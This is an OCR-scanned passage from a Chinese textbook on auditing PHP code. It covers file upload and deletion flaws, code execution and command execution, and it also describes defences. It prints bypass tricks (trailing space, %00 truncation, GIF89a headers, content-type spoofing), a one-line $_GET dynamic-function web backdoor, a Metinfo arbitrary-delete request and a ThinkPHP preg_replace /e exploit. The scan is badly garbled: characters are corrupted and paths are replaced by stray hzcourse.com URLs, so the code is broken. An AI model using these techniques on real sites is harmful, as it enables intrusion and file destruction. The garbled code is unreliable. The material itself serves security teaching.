2) 验证 扩展 名 的 方式 存在 问题 可 以 直接 绕 过 ， 另 外 是 结合 PHP 和 系统 的 特性 ， 导 致 了 可 以 截断 文件 名 来 绕 过 黑 名 单 限制 。 下 面 先 看 一 段 代 码 : 


«? php 
function getExt ($filename) ( 
return substr ($filename, strripos ($filename, '.') +1) ; 











} 
$disallowed types = array ("php", "asp", "aspx") ; 

// 获 取 文 件 扩 展 名 

$FilenameExt = strtolower (getExt ($ FILES["file"]["name"]) ) ; 
# 判 断 是 否 在 被 允许 的 扩展 名 里 

if (in array (SFilenameExt, S$disallowed types) ) { 

die ("disallowed type") ; 




















} 
else 
{ 
Sfilename = time () .".".SFilenameExt; 
// 移 动 文件 
move uploaded file ($ FILES["file"]["tmp name"], "upload/" . $FileName) ; 


这 段 代 码 的 问题 在 获取 文件 扩展 名 与 验证 扩展 名 ， 如 果 我 们 上 传 文 件 的 时 候 文件 名 为 “1.php”， 注 意 后 面 有 一 个 空格 ， 则 这 里 $FilenameExt 的 值 为 “php”， 后 面 有 一 个 空格 ， 这 时 候 
in array ($FilenameExt, $disallowed types) 是 返回 false 的 ， 最 终 成 功 上 传 文件 。 


另外 一 种 情况 是 正确 的 黑 名 单方 式 验证 了 扩展 名 ， 但 是 文件 名 没有 修改 ， 导 致 可 以 在 上 传 时 使 用 “”%00” 来 截断 写 入 ， 如 “1.php%00.jpg” ， 验 证 扩展 名 时 拿 到 的 扩展 名 是 jpg， 写 入 的 时 候 被 %00 截 


断 ， 最 终 写 入 文件 1.php， 这 里 不 再 给 出 案例 。 


3. 文 件 头 、content-type 验 证 绕 过 


这 两 种 方式 也 是 早期 出 现 得 比较 多 的 ， 早 期 搞 过 渗透 的 人 可 能 遇 到 过 ， 上 传 文件 的 时 候 ， 如 果 直 接 上 传 一 个 非 图 片 文件 会 被 提示 不 是 图 片 文件 ， 但 是 在 文件 头 里 面 如 上 “GIF89a” 后 上 传 ， 则 验证 通 
， 这 是 因为 程序 用 了 一 些 不 可 靠 的 函数 去 判断 是 不 是 图 片 文件 ， 比 如 getimagesize () 水 数 ， 只 要 文件 头 是 “GIF89a”， 它 就 会 正常 返回 一 个 图 片 的 尺寸 数组 ， 我 们 来 验证 一 下 ， 测 试 代码 : 


(rat 


«? php 
print r (getimagesize ('l.gif') ) ; ? 





测试 结果 截图 如 图 5-6 所 示 。 


Enable Post data | | Enable Referrer 


Array ( [0] = 2573 [1] = 2573 [2] = 1 [3] = w1dth- "2573" height-" 2573" [channels] — 3 [mime] => image/gif ) 


C DAwwvAtestl. gif - E * [Administrator] 
格式 (M) Ba 8280 AO 运行 (R) SHA BOW ? 
ee 9 oni X; |23e|m^)| € s| C 13 " (3502 (9) see cg | (RE) us 
"Hiep RARE ERE PERIERE ER 

1] GIF89a 

2 


mufsadfa 








图 5-0 


content-type 是 在 http request 的 请 求 头 里 面 ， 所 以 这 个 值 是 可 以 由 请 求 者 自 定义 修改 的 ， 而 早期 的 一 些 程序 只 是 单纯 验证 了 这 个 值 ， 笔 者 在 写 这 段 文 字 的 时 候 还 专门 去 w3school 等 网 站 看 了 上 面 的 
PHP 教 程 就 存在 这 个 问题 。 找 了 一 段 存在 这 个 漏洞 的 代码 如 下 : 


<? php 

$type = $ FILES['img']['type']; 

if ( ($type == "image/pjpeg") || ($type == "image/jpg") || ($type == "image/jpeg") || ($type == "image/gif") || ($type == "image/bmp") || ($type == "image/png") || ($t 
{ 























//uploading 
}? > 


4.phpcms 任 意 文件 上 传 分 析 


这 里 我 们 以 PHPCMSv9 在 2014 年 公开 的 一 个 会 员 投稿 处 文件 上 传 漏洞 ， 漏 洞 作者 felixk3y， 漏 洞 乌云 编号 : Wooyun-2014-062881， 漏洞 在 文件 /phpcms/libs/classes/attachment.class.php 的 
upload () 浮 数 ,为 了 易于 理解 ， 这 里 省 略 部 分 代码 ， 代 码 如 下 : 








function upload ($field, Salowexts = '', S$maxsize = 0, Soverwrite = 0, $thumb setting = array () , Swatermark enable = 1) | 
[KG abe / = = 
Sthis-»alowexts = Salowexts; // 获 取 允 许 上 传 的 类 型 
[EKG BRR RX / 











foreach ($uploadfiles as $k=>$file) ( // 多 文件 上 传 ， 循环 读 取 文 件 上 传 表单 
$fileext = fileext ($file['name']) ; // 获 取 文件 扩展 名 

















/xx 大 省 WE / 

// 检 查 上 传 格 式 ， 不 过 Salowexts 是 从 表单 提交 的 ， 可 绕 过 if (! preg match ("/^ (".$this-»alowexts.") $/", $fileext) ) { 
Sthis->error = '10'; 
return false; 

or WE / 





Stemp filename = $this->getname ($fileext) ; 
$savefile = $this-»savepath.$temp filename; 




















$savefile = preg replace ("/ (php [phtm1 |php3 Iphp4 | jsplexeldlllasplcer|asa|shtml | shtmlaspx|asax|cgi | fcgi |p1) (\.1$) /i", "\\1\\2", Ssavefile) ;  // 最 需要 绕 过 的 地 方 在 这 里 
COPIE E IAES 
if (@Supload func (Sfile['tmp name'], S$savefile) ) { 








从 上 面 的 代码 我 们 可 以 看 出 ， 这 个 漏洞 最 有 意思 的 地 方 在 : 











$savefile = preg_replace ("/ (phpl|phtml|php3|php4|jsplexe|dll|asplcer|asa| shtml|shtm [|aspx|asax|cgilfcgilpl) (\.1$) /i", " \\1\\2", Ssavefile) ; 





而 获取 文件 扩展 名 的 函数 内 容 为 : 














Function fileext ($filename) { 
return strtolower (trim (substr (strrchr ($filename, '.') , 1, 10))); 
} 

















这 里 用 了 trim () 函数 去 掉 了 空格 ， 我 们 之 前 举例 用 空格 绕 过 的 方式 在 这 里 就 不 好 使 了 ， 那 有 没有 其 他 字符 一 样 可 以 达到 空格 的 效果 呢 ， 即 “1.phpX” ，X 代 表 某 个 字符 ”仔细 看 正则 会 把 


3I] "1.php" RJ "1. php”， 把 “1.phpjpg” 蔡 损 为 “1._phpjpg”， 作 者 利用 fuzz 的 方式 找到 了 9%81-%99 是 可 行 的 ， 仅 在 Windows 下 。 利 用 时 修改 文件 上 传 表 单 里 的 filename， 在 文件 名 后 面 利 用 
十 六 进 制 修改 原 预 留 的 空格 20 为 81~99 中 的 一 个 。 


5.1.4 文件 删除 漏洞 
文件 删除 漏洞 出 现在 有 文件 管理 功能 的 应 用 上 比较 多 ， 这 些 应 用 一 般 也 都 有 文件 上 传 和 读 取 等 功能 ， 它 的 漏洞 原理 跟 文件 读 取 漏 洞 是 差不多 的 ， 不 过 是 利用 的 函数 不 一 样 而 已 ， 一 般 也 是 因为 删除 的 文 


件 名 可 以 用 http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../ 跳 转 ,或 者 没有 限制 当前 用 户 只 能 删除 他 该 有 权限 删除 的 文 
件 。 常 出 现 这 个 漏洞 的 浮 数 是 unlink () ， 不 过 老 版 本 下 session_destroy () 函数 也 可 以 删除 文件 。 


挖掘 经 验 : 挖掘 文件 删除 漏洞 可 以 先 去 找 相 应 的 功能 点 ， 直 接 黑 盒 测 试 一 下 看 能 不 能 删除 某 个 文件 ， 如 果 删 除 不 了 ， 再 去 从 执行 流程 去 追 提交 的 文件 名 参数 的 传递 过 程 ， 这 样 查找 起 来 比较 精准 。 如 果 


纯 白 盒 挖 的 话 ， 也 可 以 去 搜索 带 有 变量 参数 的 unlink () ， 依 然 采 用 回溯 变量 的 方式 。 关 于 session destroy () 函数 删除 任意 文件 的 漏洞 这 里 就 不 再 举例 了 ， 因 为 在 比较 早 的 PHP 版 本 就 已 经 修复 掉 了 这 个 
问题 ， 限 制 了 PHPSESSID 只 能 由 “字母 + 数字 + 横 杆 ”符号 组 成 。 


Metinfo 任 意 文 件 删除 分 析 


这 里 的 案例 使 用 笔者 之 前 发 现 的 一 个 metinfo 企 业内 容 管理 系统 漏洞 来 说 明 ， 漏 洞 在 recovery.php 文 件 ， 代 码 如 下 : 


if (Saction--'delete') { 
if (is array ($filenames) ) { 
foreach ($filenames as $filename) { 
if (fileext ($filename) --'sql') { 
@unlink ('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../databack/'.S$filename) ; 
} 























} 





























Jelse( 
if (fileext ($filenames) --'sql') { Sfilenamearray-explode (".sql", $filenames) ; 
@unlink ('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../http: //www.hzcourse.com/resource/readBook?path- 
@unlink ('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../http: //www.hzcourse.com/resource/readBook?pa 
Jelse( 


// 如 果 不 是 SQL 文 件 ， 直 接 删 除 
@unlink ('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../http: //www.hzcourse.com/resource/readBook?path-/ 


} 














这 段 代 码 首 先 判断 请 求 的 action 参 数 的 值 是 不 是 delete， 如 果 是 则 进入 文件 删除 功能 ， 在 代码 : 








if (fileext ($filenames) --'sql') { 


判断 如 果 不 是 sql 文 件 后 ， 就 直接 在 databack 目 录 删 除 提交 的 文件 名 ， 代 码 中 $filenames 函 数 从 GET 中 提交 ， 只 要 请 求 : 

















/recovery.php? &action-delete&filenames-http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/0EBPS/Text/../http://www.hzcourse.com/resou 
即 可 删除 index.php 文 件 。 
5.1.5 ”文件 操作 漏洞 防 学 
文件 操作 漏洞 在 部 分 原理 及 利用 方式 上 面 都 有 一 定 相似 性 ， 所 以 下 面 我 们 分 为 通用 防御 手段 和 针对 性 防御 手段 来 介绍 怎么 防御 文件 操作 漏洞 。 
5.1.5.1. 通用 文件 操作 防御 
文件 操作 漏洞 利用 有 几 个 共同 点 如 下 : 
1) 由 越权 操作 引起 可 以 操作 未 授权 操作 的 文件 。 
2) 要 操作 更 多 文件 需要 跳 转 目录 。 
3) 大 多 都 是 直接 在 请 求 中 传 入 文件 名 。 


我 们 需要 这 几 个 共同 点 来 思考 防御 手段 : 


* 对 权限 的 管理 要 合理 ， 比 如 用 户 A 上 传 的 文件 其 他 平行 权限 的 用 户 在 未 授权 的 情况 下 不 能 进行 查看 和 删除 等 操作 ， 特 殊 的 文件 操作 行为 限定 特定 用 户 才 有 权限 ， 比 如 后 台 删 除 文件 的 操作 ， 肯 定 是 需 
要 限制 管理 员 才 能 操作 。 


有 的 文件 操作 是 不 需要 直接 传 入 文件 名 的 ， 比 如 下 载 文件 的 时 候 ， 下 载 的 文件 是 已 知 的 ， 则 我 们 可 以 用 更 安全 的 方法 来 替代 直接 以 文件 名 为 参数 下 载 操 作 ， 在 上 传 文件 时 ， 只 要 把 文件 名 、 文 件 路 
径 、 文 件 ID (随机 MD5 形 式 ) 以 及 文件 上 传人 存储 在 数据 库 中 ， 下 载 的 时 候 直 接 根 据 文件 ID 和 当前 用 户 名 去 判断 当前 用 户 有 没有 权限 下 载 这 个 文件 ， 如 果 有 则 读 取 路 径 指向 的 这 个 文件 并 返回 下 载 即 可 。 


“ 要 避免 目录 跳 转 的 问题 ， 在 满足 业务 需求 的 情况 下 ， 我 们 可 以 使 用 上 面 第 二 说 的 方法 , 但 是 有 的 情况 下 如 后 台 进 行文 件 编辑 等 操作 时 ， 需 要 传 入 文件 路 径 的 ， 可 以 在 后 侣 固定 文件 操作 目录 ， 然 后 禁 
LAA PA "http:/ /www.hzcourse.com/resource/readBook?path- /openresources/teach ebook /uncompressed/15497/OBBPS/Text/.." 两 个 点 和 反 斜 枉 “/” 以 及 斜 杠 人 ”来 跳 转 目录 ， 怎 么 禁止 呢 ? 检查 到 传 入 
的 参数 有 这 些 字符 ， 之 间 提 示人 禁止 操作 并 停止 程序 继续 往 下 执行 即 可 。 


5.1.5.2 ”文件 上 传 漏洞 防范 


文件 上 传 漏洞 相 比 下 载 、 删 除 更 复杂 ， 所 以 这 里 单独 拿 出 来 讲 一 下 怎么 防范 ， 文 件 上 传 漏洞 虽然 定位 起 来 比较 简单 ， 但 是 修复 起 来 要 考虑 的 东西 还 是 不 少 ， 主 要 是 不 同 环 境 下 的 利用 场景 比较 多 ， 需 
比较 完善 的 策略 去 防止 漏洞 出 现 。 修 复 和 防止 一 种 漏洞 之 前 ， 要 比较 全 的 清楚 这 种 漏洞 在 不 同 环 境 下 的 利用 方式 ， 这 样 才能 防御 的 比较 全 ， 文 件 上 传 漏洞 主要 有 两 种 利用 方式 ， 分 为 上 传 的 文件 类 型 验证 不 
严谨 和 写 入 文件 不 规范 。 针 对 这 两 种 利用 方式 ， 我 给 出 的 防范 方案 如 下 : 


1) 白 名 单方 式 过 滤 文 件 扩展 名 ， 使 用 in_array 或 者 三 等 于 (===) 来 对 比 扩展 名 。 
2) 保存 上 传 的 文件 时 重 命名 文件 ， 文 件 名 命名 规则 采用 时 间 戳 的 拼接 随机 数 的 MD5 值 方式 "md5 (time () +rand (1, 10000) ) ". 


我 们 对 之 前 的 代码 稍微 改动 下 ， 给 出 示例 代码 如 下 : 


<? php 
function getExt ($filename) ( 
return substr ($filename, strripos ($filename, '.') +1) ; 











} 
$disallowed types = array ('jpg', 'png', 'gif') ; 

// 获 取 文 件 扩展 名 

$FilenameExt = strtolower (getExt ($ FILES["file"]["name"]) ) ; 
# 判 断 是 否 在 被 允许 的 扩展 名 里 

if (! in array ($FilenameExt, $disallowed types) ) 1 

die ("disallowed type") ; 
































) 











else 
{ 
Sfilename = md5 (time () «rand (1, 10000) ) .".".SFilenameExt; 
// 移 动 文件 
move uploaded file ($ FILES["file"]["tmp name"], "upload/" . $FileName) ; 








}2 > 


5.2 ”代码 执行 漏洞 


代码 执行 漏洞 是 指 应 用 程序 本 身 过 滤 不 严 ， 用 户 可 以 通过 请 求 将 代码 注入 到 应 用 中 执行 。 说 得 好 理解 一 点 ， 类 似 于 SQL 注入 漏洞 ， 可 以 把 SQL 语句 注入 到 SQL 服务 执行 ， 而 PHP 代 码 执行 漏洞 则 是 可 以 把 
代码 注入 应 用 中 最 终 到 Webserver 去 执行 。 这 样 的 漏洞 如 果 没 有 特殊 的 过 滤 ， 相 当 于 直接 有 一 个 Web 后 门 存 在 ， 该 漏洞 主要 由 eval () . assert () . preg_replace () . call user func () 、 
call user func array () . array map () 等 函数 的 参数 过 滤 不 严格 导致 ， 另 外 还 有 PHP 的 动态 函数 ($a ($b) ) 也 是 目前 出 现 比较 多 的 。 


5.2.1 ”挖掘 经 验 


eval () 和 assert () 函数 导致 的 代码 执行 漏洞 大 多 是 因为 载 入 缓存 或 者 模板 以 及 对 变量 的 处 理 不 严格 导致 ， 比 如 直接 把 一 个 外 部 可 控 的 参数 拼接 到 模板 里 面 ， 然 后 调用 这 两 个 函数 去 当成 PHP 代 码 执 


preg_replace () 函数 的 代码 执行 需要 存在 /e 参 数 ， 这 个 函数 原本 是 用 来 处 理 字符 串 的 ， 因 此 漏洞 出 现 最 多 的 是 在 对 字符 串 的 处 理 ， 比 如 URL、HTML 标 签 以 及 文章 内 容 等 过 滤 功 能 。 


call user func () 和 call_user func array () 函数 的 功能 是 调用 函数 ， 多 用 在 框架 里 面 动 态 调用 函数 ， 所 以 一 般 比 较 小 的 程序 出 现 这 种 方式 的 代码 执行 会 比较 少 。array_map () 函数 的 作用 是 调用 
函数 并 且 除 第 一 个 参数 外 其 他 参数 为 数组 ， 通 常会 写 死 第 一 个 参数 ， 即 调用 的 函数 ， 类 似 这 三 个 函数 功能 的 函数 还 有 很 多 。 


除了 上 面 这 些 函 数 导 致 的 代码 执行 漏洞 ， 还 有 一 类 非常 常见 的 是 动态 函数 的 代码 执行 ， 比 如 下 面 这 样 的 写法 : 





$ GET ($ POST["xx"]) 





基于 这 种 写法 变形 出 来 的 各 种 异形 ， 经 常 被 用 来 当 作 Web 后 门 使 用 ， 可 以 看 到 这 里 的 PHP 国 数 是 从 $_GET 变 量 当做 字符 串 传 入 进来 的 ， 这 是 PHP 的 一 个 特性 。 


5.2.1.1. 代码 执行 函数 


PHP 代 码 执行 有 多 种 利用 方式 ， 但 目前 见得 最 多 的 还 是 由 于 函数 的 使 用 不 当 导 致 的 ， 这 类 函数 还 不 少 ， 有 eval () 、assert () . preg_replace () . call user func () . call user func array () 以 
及 array_ map () 等 ， 下 面 我 们 来 详细 看 看 各 自 产 生 漏洞 的 原理 和 利用 方式 吧 。 


1.eval 和 assert 国 数 


这 两 个 函数 原本 的 作用 就 是 用 来 动态 执行 代码 ， 所 以 它们 的 参数 直接 就 是 PHP 代 码 ， 我 们 来 看 看 是 怎么 使 用 的 ， 测 试 代码 如 下 : 





Sb-'bbb'; 
eval ('$a-$b; ') ; 
var dump ($a) ; 


测试 截图 如 图 5-7 所 示 。 


oc E & s ii| 4 | 


D =e 


| € @ localhost/test/1.php 

INT z| = e SQl- XSS- Encryption E 
«S LoadURL  http;/localhost/test/1.php 
Split URL | 


2) Execute 


> 


»b-'bbb' 
evalí('$a-$b;'); 


var dump ($a); — 
x string(3) "bbb" 


| Enable Post data Enable 






































2.preg replace£Rz 
preg_replace 国 数 的 作用 是 对 字符 串 进行 正则 处 理 ， 我 们 在 上 面 的 挖掘 经 验 已 经 介绍 了 ， 它 经 常会 出 现 漏洞 的 位 置 ， 下 面 我 们 来 看 看 它 在 什么 情况 下 才 会 出 现代 码 执行 漏洞 。 


它 的 参数 和 返回 如 下 : 


mixed preg replace ( mixed $pattern , mixed $replacement , mixed $subject [, int Slimit = -1 [, int &$count ]] ) 











这 段 代 码 的 含义 是 搜索 $subject 中 匹配 $pattern 的 部 分 ， 以 $replacement 进 行 蔡 换 ， 而 当 $pattern 处 即 第 一 个 参数 存在 e 修 饰 符 时 ，$replacement 的 值 会 被 当成 PHP 代 码 来 执行 ， 我 们 来 看 一 个 简单 的 
例子 (1.php) 。 


«? php 
preg replace ("/\[ (.*) M]/e", '\\L', $ GET['str']) ; ? > 





正则 的 意思 是 从 $_GET[str] 变 量 里 搜索 中 括号 0] 中间 的 内 容 作为 第 一 组 结果 ，preg_replace () RABTA NT 代表 这 里 用 第 一 组 结果 填充 ， 这 里 是 可 以 直接 执行 代码 的 ， 所 以 当 我 们 请 
求 /1.php? str=[phpinfo () ] 时 ， 则 执行 代码 phpinfo () ， 结 果 如 图 5-8 所 示 。 


zal = @ SQL> XSS- Encryption Encoding Other- 


lad URL — http;/localhost/test/1.php?str-[phpinfo()] 
kecute 


Enable Post data Enable Referrer 





3. 调 用 函数 过 滤 不 严 


call user func () 和 array_ map () 等 数 十 个 函数 有 调用 其 他 函数 的 功能 ， 其 中 的 一 个 参数 作为 要 调用 的 函数 名 ， 那 如 果 这 个 传 入 的 函数 名 可 控 ， 那 就 可 以 调用 意外 的 函数 来 执行 我 们 想 知道 的 代码 ， 
也 就 是 存在 代码 执行 漏洞 。 


我 们 用 call_user_func () 函数 来 举例 ， 函 数 的 作用 是 调用 函数 并 且 第 二 个 参数 作为 要 调用 的 函数 的 参数 ， 官 方 说 明 如 下 : 

















mixed call user func ( callable $callback [, mixed $parameter [, mixed Shttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Te: 
该 函数 第 一 个 参数 为 回调 函数 ， 后 面 的 参数 为 回调 函数 的 参数 ， 测 试 代 码 如 下 : 


«? php 
Sb="phpinfo () " 
call user func (5 _GET['a'], $b) ; ? > 








当 请 求 1.php? a=assert 的 时 候 ， 则 调用 了 assert 函 数 ， 并 且 将 phpinfo () 作为 参数 传 入 ， 如 图 5-9 所 示 。 


idministrator] 
+) #26 226 ”视图 (V) 格式 (M) 语言 (L) 820 XO) 2f 
WETTY NONU RU NC I nr nm IIT 
Jd 1 pd 


INT *| = 9 SQL- XSS- Encryption: Encoding 
Load URL | http:;//localhost/test/1.php?a-assert 


$b-"phpinfo () " : 


|call user func($ GET['a'],$b); 
2> 


E 
Ü Split URL 
© 


Enable Post data Enable R 





同类 的 函数 还 有 如 下 这 些 : 





call user func () . call user func array () . array map () 

usort () . uasort () . uksort () . array filter () 

array reduce () . array diff uassoc () . array diff ukey () 

array udiff () . array udiff assoc () . array udiff uassoc () 

array intersect assoc () . array intersect uassoc () 

array uintersect () . array uintersect assoc () 

array uintersect uassoc () . array walk () . array walk recursive () 


































































































xml set character data handler () . xml set default handler () 

xml set element handler () . xml set end namespace decl handler () 

xml set : external entity ref handler () 、 xml set : notation : decl handler () 

xml set processing instruction handler 0 

xml set start namespace decl handler () 

xml set unparsed entity decl handler () . stream filter register () 

set error handler () . register shutdown function () . register tick function () 





5.2.1.2 ”动态 国 数 执行 


由 于 PHP 的 特性 原因 ，PHP 的 函数 可 以 直接 由 字符 串 拼 接 ， 这 导致 了 PHP 在 安全 上 的 控制 又 加 大 了 难度 ， 比 如 增加 了 漏洞 数量 和 提高 了 PHP 后 门 的 查 杀 难度 。 要 找 漏 洞 就 要 先 理解 为 什么 程序 代码 要 这 


么 写 ， 不 少 知名 程序 中 也 用 到 了 动态 函数 的 写法 ， 这 种 写法 跟 使 用 call_user_func 的 初衷 是 一 样 的 ， 大 多 用 在 框架 里 ， 用 来 更 简单 更 方便 地 调用 函数 ， 但 是 一 旦 过 滤 不 严格 就 会 造成 代码 执行 漏洞 。 
PHP 动 态 函 数 写法 为 “变量 (参数 ) ”， 我 们 来 看 一 个 动态 函数 后 门 的 写法 : 


<? =M 
$ GET['a'] ($_GET['b']) ; ? > 








代码 的 意思 是 接收 GET 请 求 的 3 参数， 作为 函数 ，b 参 数 作为 函数 的 参数 。 当 请 求 a 参 数值 为 assert，b 参 数值 为 phpinfo () 的 时 候 打印 出 phpinfo 信 息 ， 请 求 如 下 : 


http: //127.0.0.1/test/1.php? a-assert&b-phpinfo () 





执行 结果 如 图 5-10 所 示 。 























)@ 127.0.0.1/test/1.php?a=assert&b=phpinfo) v C | B * StartPage | 
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图 5-10 


要 挖掘 这 种 形式 的 代码 执行 漏洞 ， 需 要 找 可 控 的 动态 国 数 名 。 
5.2.1.3 Thinkphp 代 码 执行 漏洞 分 析 


要 分 析 代 码 执行 的 案例 ， 在 Java 界 来 说 就 是 struts2 的 代码 执行 了 ， 不 过 在 PHP 领 域 ， 国 内 影响 比较 大 的 代码 执行 漏洞 非 thinkphp 框 架 URL 解 析 的 代码 执行 漏洞 莫 属 ， 这 个 漏洞 的 影响 力 ， 做 渗透 测试 的 
安全 人 员 应 该 比较 清楚 ， 在 国内 还 是 会 经 常 遇 到 这 个 漏洞 的 。 


下 面 我 们 来 分 析 这 个 漏洞 的 原理 ，thinkphp 框 架 的 GET 参 数 以 index.php/a/byc 的 形式 传递 ， 程 序 在 获取 参数 之 前 需要 先 解 析 URL， 漏 洞 就 发 生 在 解析 URL 的 地 方 ， 官 方 补丁 对 比 地 址 如 下 : 
https:/ /code.google.com/p/thinkphp/source/diff? spec=svn2904&r=2838&format=side&path= /trunk/ThinkPHP/Lib/Core/Dispatchet.class.php. 


漏洞 出 现在 /ThinkPHP/Lib/Core/Dispatcher.class.php 文 件 的 dispatch () 函数 ， 为 了 节省 篇 幅 ， 这 里 只 贴 出 关键 代码 : 





$depr = C ('URL PATHINFO DEPR') ; 
if (! empty ($ SERVER['PATH INFO! 13 TJ 
tag ('path info') ; 
£ (C ('URL HTML SUFFIX") j { 
$ SERVER['PATH INFO'] = preg replace ('/N.'.trim (C ('URL HTML SUFFIX') , '.') .'$/i', '', $ SERVER['PATH INFO']) ; 





















































} 
if (! self: : routerCheck () ) { // 检测 路 由 规则 如 果 没 有 则 按 默认 规则 调度 URL 
Spaths = explode ($depr, trim ($ SERVER['PATH INFO'], '/') ) ; 














JG eek / 

$var[C ('VAR ACTION') ] = array shift ($paths) ; 

// 解析 剩余 的 URL 参 数 

$res = preg replace ('@ (\wt) '.$depr.' ([^'.S$depr.'V/]4) @e' "Svar [\'\\1\'J="\\2"; ', implode (Sdepr, $paths) ) ; 
$ GET = array merge ($var, $ GET) ; 





可 以 看 到 这 里 使 用 preg_replace () 函数 ， 我 们 在 前 面 已 经 介绍 了 关于 这 个 函数 的 代码 执行 漏洞 ， 这 个 函数 里 面 的 变量 为 gdepr 和 $paths， 代 码 中 的 这 句 话 : 








Sdepr = C ('URL PATHINFO DEPR') H 





是 取得 配置 中 的 参数 分 隔 符 ， 下 面 这 句 话 : 





Spaths = explode ($depr, trim ($ SERVER['PATH INFO'], '/') ) ; 











则 是 从 $_SERVER['PATH_INFO"] 中 以 $depr 为 分 隔 符 分 割 后 的 数组 ， 而 后 面 又 用 implode () 函数 还 原 成 字符 串 才 带 入 preg_replace () 函数 ， 关 键 在 于 : 


' Svar[N Y NN Y ]E"NN2 Y 


代码 的 意思 是 ， 把 正则 匹配 出 来 的 参数 1 初始 化 到 9var 变 量 中 ， 并 且 赋 值 为 参数 2 的 值 ， 问 题 是 这 段 代 码 在 赋值 的 时 候 使 用 的 是 双 引 号 (") ， 在 PHP 中 ， 如 果 字 符 串 使 用 双 引 号 括 起 来 ， 中 间 的 变量 是 会 
正常 解析 的 ， 如 : 





会 输出 1， 而 不 是 ya， 利 用 这 个 特性 ， 再 结合 PHP 可 变 变 量 即 可 执行 任意 代码 ， 最 终 EXP 为 : 





/index.php/module/action/param1/${@phpinfo () } 








5.2.2 WARE 


采用 参数 白 名 单 过滤 ， 在 可 预测 满足 正常 业务 的 参数 情况 下 ， 这 是 非常 实用 的 方式 ， 这 里 的 白 名 单 并 不 是 说 完全 固定 为 参数 ， 因 为 在 eval () . assert () MHpreg replace () 函数 的 参数 中 大 部 分 是 
不 可 预测 一 字 不 差 的 ， 我 们 可 以 结合 正则 表达 式 来 进行 白 名 单 限制 ， 用 上 面 的 thinkphp 来 举例 ， 如 果 我 们 事先 已 经 知道 这 个 URL 里 面 的 第 二 个 参数 值 由 数字 构成 即 可 满足 业务 需求 ， 则 可 以 在 正则 里 用 
\d+ 来 限制 第 二 个 参数 内 容 ， 这 样 相对 更 加 安全 ， 用 代码 举例 更 加 清晰 易 懂 ， 代 码 如 下 : 





<? php 
preg_replace ('/ (\wt) \| (.*) /ie', 'S\\1="\\2"; ', $ GET['a']);? > 








这 段 代码 是 有 问题 的 ， 只 要 提交 /1.php? a-b|$(G phpinfo () } 即 可 执行 phpinfo () 函数 ， 这 时 候 如 果 我 们 知道 \2 的 值 范围 为 纯 数字 ， 只 要 正则 改 成 (\w+) N (\d+) 即 可 解决 执行 代码 的 问题 ， 
是 一 种 修复 方案 ， 最 好 的 方法 是 : 在 $\\1= "\\2 "这 里 不 要 用 双 引 号 。 


这 只 


5.3 fpe P iile 


代码 执行 漏洞 指 的 是 可 以 执行 PHP 脚 本 代码 ， 而 命令 执行 漏洞 指 的 是 可 以 执行 系统 或 者 应 用 指令 (如 CMD 命 令 或 者 bash 命 令 ) By, PHASHA iis tAE — ECER RS EOSEISASTE SER, 
可 以 执行 命令 的 函数 有 system () 、exec () 、shell exec () 、passthru () . pcntl exec () 、popen () 、proc open () ， 一 共 七 个 国 数 ， 另 外 反 引 号 C) 也 可 以 执行 命令 ， 不 过 实际 上 这 种 方式 
也 是 调用 的 shell exec () 函数 。PHP 执 行 命令 是 继承 WebServer 用 户 的 权限 ， 这 个 用 户 一 般 都 有 权限 向 Web 目 录 写 文件 ， 可 见 该 漏洞 的 危害 性 相当 大 。 


5.3.1 “挖掘 经 验 


命令 执行 漏洞 最 多 出 现在 包含 环境 包 的 应 用 里 ， 类 似 于 eyou ( 亿 邮 ) 这 类 产品 ， 直 接 在 系统 安装 即 可 启动 自 带 的 Web 服 务 和 数据 库 服务 ， 一 般 这 类 的 产品 会 有 一 些 额 外 的 小 脚本 来 协助 处 理 日 志 以 及 数 
据 库 等 ，Web 应 用 会 有 比较 多 的 点 之 间 使 用 system () 、exec () . shell exec () 、passthru () . pcntl exec () 、popen () . proc open () 等 函数 执行 系统 命令 来 调用 这 些 脚本 ， 用 得 多 了 难免 
就 会 出 现 丝 漏 导 致 漏 词 ， 这 类 应 用 可 以 直接 在 代码 里 搜 这 几 个 函数 ， 收 获 应 该 会 不 少 。 除 了 这 类 应 用 ， 还 有 像 discuz 等 应 用 也 有 调用 外 部 程序 的 功能 ， 如 数据 库 导 出 功能 ， 曾 经 就 出 现 过 命令 执行 漏洞 ， 
为 特征 比较 明显 ， 所 以 可 以 直接 搜 函 数 名 即 可 进行 漏洞 挖掘 。 


5.3.1.1 ”命令 执行 函数 


上 面 我 们 说 到 有 七 个 常用 函数 可 以 执行 命令 ， 包 括 system () 、exec () 、shell exec () 、passthru () . pcntl exec () 、popen () 、proc open () ， 另 外 还 有 反 引 号 C) 也 一 样 可 以 执行 命 
， 下 面 我 们 来 看 看 它们 的 执行 方式 。 


4» 


这 些 函 数 里 system () . exec () | shell exec () | passthru () 以 及 反 引 号 C) 是 可 以 直接 传 入 命令 并 且 函 数 会 返回 执行 结果 ， 比 较 简单 和 好 理解 ， 其 中 system () 函数 会 直接 回 显 结果 打印 输 
出 ， 不 需要 echo 也 可 以 ， 我 们 来 用 代码 举例 。 测 试 代 码 如 下 : 





«? php 
system ('whoami') ; ? » 


可 以 看 到 执行 结果 输出 了 当前 WebServer 用 户 ， 如 图 5-11 所 示 。 


pcntl 是 PHP 的 多 进程 处 理 扩展 ， 在 处 理 大 量 任务 的 情况 下 会 使 用 到 ， 使 用 pcntl 需 要 额外 安装 ， 它 的 函数 说 明 如 下 : 


void pentl_ exec ( string $path [, array $args [, array Senvs ]] ) 





























system('whoami'); xz) LoadURL http;//localhost/test/1.php 
?> Ü Split URL 


+) Execute 
Enable Post data [| Enable 


pc201407182221Nadministrator 





其 中 $path 为 可 执行 程序 路 径 ， 如 果 是 Per| 或 者 Bash 脚 本 ， 则 需要 在 文件 头 加 上 #! /bin/bash 来 标识 可 执行 程序 路 径 ，$args 表 示 传 递 给 $path 程序 的 参数 ，$envs 则 是 执行 这 个 程序 的 环境 变量 。 


